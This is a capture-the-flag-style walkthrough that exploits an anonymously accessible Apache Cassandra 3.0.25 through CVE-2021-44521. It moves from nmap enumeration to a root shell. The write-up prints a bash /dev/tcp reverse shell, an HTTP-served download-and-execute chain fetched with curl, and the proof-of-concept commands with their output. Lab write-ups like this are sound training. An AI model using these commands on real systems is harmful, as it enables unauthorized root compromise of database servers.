# Enumeration

## Nmap
We'll start off with an `nmap` scan that reveals only port 7000 is open.
```
kali@kali:~$ sudo nmap -sV -sC 172.21.0.2
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-02 13:13 WIB
Nmap scan report for 172.21.0.2
Host is up (0.000016s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE          VERSION
7000/tcp open  afs3-fileserver?
|_irc-info: Unable to open connection

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.58 seconds
```
Nmap wasn't able to fingerprint the service banner. Let's try to quickly scan all open ports only.
```
kali@kali:~$ sudo nmap -p- --open 172.21.0.2
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-02 13:22 WIB
Nmap scan report for 172.21.0.2
Host is up (0.000011s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
7000/tcp open  afs3-fileserver
9042/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 14.32 seconds
```
There is another port 9042 open, let's specifically fingerprint that.
```
kali@kali:~$ sudo nmap -sV -sC -p 9042 172.21.0.2
Starting Nmap 7.91 ( https://nmap.org ) at 2022-09-02 13:24 WIB
Nmap scan report for 172.21.0.2
Host is up (0.000051s latency).

PORT     STATE SERVICE          VERSION
9042/tcp open  cassandra-native Apache Cassandra 3.0.0 - 3.9 (native protocol version 3-4)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds
```
This port runs an Apache Cassandra native protocol version 3.x which is more interesting than the other port.

## Cassandra Native Protocol
[Apache Cassandra is a NoSQL type Database](https://en.wikipedia.org/wiki/Apache_Cassandra). A google search for
_cassandra native protocol enumeration_ will lead us [here](https://book.hacktricks.xyz/network-services-pentesting/cassandra#enumeration).
We can manually enumerate this protocol by login in using `cqlsh` command that is easily install using `pip`.
```
kali@kali:~$ pip install cqlsh --user
Collecting cqlsh
  Downloading cqlsh-6.0.0-py3-none-any.whl (106 kB)
...
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from cqlsh) (1.16.0)
Collecting cassandra-driver
  Downloading cassandra_driver-3.25.0-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.whl (3.6 MB)
...
Building wheels for collected packages: cql, thrift
  Building wheel for cql (setup.py) ... done
...
Successfully built cql thrift
Installing collected packages: thrift, geomet, cql, cassandra-driver, cqlsh
  WARNING: The script geomet is installed in '/home/kali/.local/bin' which is not on PATH.
Successfully installed cassandra-driver-3.25.0 cql-1.4.0 cqlsh-6.0.0 geomet-0.2.1.post1 thrift-0.16.0
```
The installation succeeds but notice the **WARNING** message, the `~/.local/bin` directory is not on our PATH.
```
kali@kali:~$ export PATH=$PATH:~/.local/bin
kali@kali:~$ cqlsh --version
cqlsh 6.0.0
kali@kali:~$ cqlsh 172.21.0.2
Connected to Troy at 172.21.0.2:9042
[cqlsh 6.0.0 | Cassandra 3.0.25 | CQL spec 3.4.0 | Native protocol v4]
Use HELP for help.
cqlsh>
```
Notice the protocol allows us to login anonymously, the cluster name is **Troy** and the cassandra exact version is **3.0.25**.

# Exploitation
## Remote Code Execution
Let's search known vulnerabilities for Cassandra using `searchsploit`
```
kali@kali:~$ searchsploit cassandra
------------------------------------------------------------- ------------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ------------------------------------
Atrium Software Cassandra NNTP Server 1.10 - Buffer Overflow | windows/dos/19884.txt
Cassandra Web 0.5.0 - Remote File Read                       | linux/webapps/49362.py
------------------------------------------------------------- ------------------------------------
Shellcodes: No Results
```
Only two results but none match our target version or the software name. However,
There are [14 CVE records](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=apache%20cassandra) and the latest one
[CVE-2021-44521](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44521) is the most promising as it contains the disclosure
[report](https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/) and a
proof of concept in action. It also contains the affected versions in **How to remediate CVE-2021-44521** section.
```
We highly recommend that all Apache Cassandra users upgrade to one of the following versions...

3.0.x users should upgrade to 3.0.26
3.11.x users should upgrade to 3.11.12
4.0.x users should upgrade to 4.0.2
```
Our target version is clearly affected and the **PoC in action** steps are easy to follow to exploit this manually. However, using
[Github to search for CVE-2021-44521](https://github.com/search?q=CVE-2021-44521) will lead us
[here](https://github.com/QHpix/CVE-2021-44521), let's clone and inspect the repo.
```
kali@kali:~$ git clone --depth 1 https://github.com/QHpix/CVE-2021-44521
Cloning into 'CVE-2021-44521'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 4 (delta 0), reused 1 (delta 0), pack-reused 0
Unpacking objects: 100% (4/4), done.
kali@kali:~$ cd CVE-2021-44521/
kali@kali:~/CVE-2021-44521$ ls -l
total 8
-rw-r--r-- 1 kali kali 1740 Sep  2 15:29 poc.py
-rw-r--r-- 1 kali kali  556 Sep  2 15:29 README.md
kali@kali:~/CVE-2021-44521$ cat README.md
...
# Requirements
Cassandra-driver
pip3 install cassandra-driver
# Usage
python3 poc.py <ip> <cmd>
Note that you can't do more command at a time, neither use pipes as of yet.
So run
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"
kali@kali:~/CVE-2021-44521$ cat poc.py
...
# Pipes don't work directly. So no traditional rev shell. Use wget + chmod +x instead
...
```
Notice the usage says we can't do multiple commands at once and no traditional reverse shell. We have to create a file containing
a reverse shell command and then use the exploit to trigger the target to download it. Let's do that first.
```
kali@kali:~/CVE-2021-44521$ cat << EOF > shell.sh
> /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.120.3/4444 0>&1'
> EOF
kali@kali:~/CVE-2021-44521$ ls -l shell.sh
-rw-r--r-- 1 kali kali 64 Sep  2 15:52 shell.sh
kali@kali:~/CVE-2021-44521$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
Simple reverse shell file created and served using Python HTTP. Now let's use the exploit to trigger the download.
```
kali@kali:~/CVE-2021-44521$ python3 poc.py 172.21.0.2 'curl http://192.168.120.3:8000/shell.sh -o /tmp/shell.sh'
```
```
kali@kali:~/CVE-2021-44521$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
172.21.0.2 - - [02/Sep/2022 15:57:47] "GET /shell.sh HTTP/1.1" 200 -
```
Nice! The download is triggered! Let's setup a `netcat` listener, run the exploit script again to `chmod` and execute the shell.
```
kali@kali:~/CVE-2021-44521$ nc -nlvp 4444
listening on [any] 4444 ...
```
```
kali@kali:~/CVE-2021-44521$ python3 poc.py 172.21.0.2 'chmod +x /tmp/shell.sh'
kali@kali:~/CVE-2021-44521$ python3 poc.py 172.21.0.2 '/tmp/shell.sh'
```
Finally, we get a reverse shell as **root**
```
kali@kali:~/CVE-2021-44521$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.120.3] from (UNKNOWN) [172.21.0.2] 55658
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@troy:/# whoami
root
```
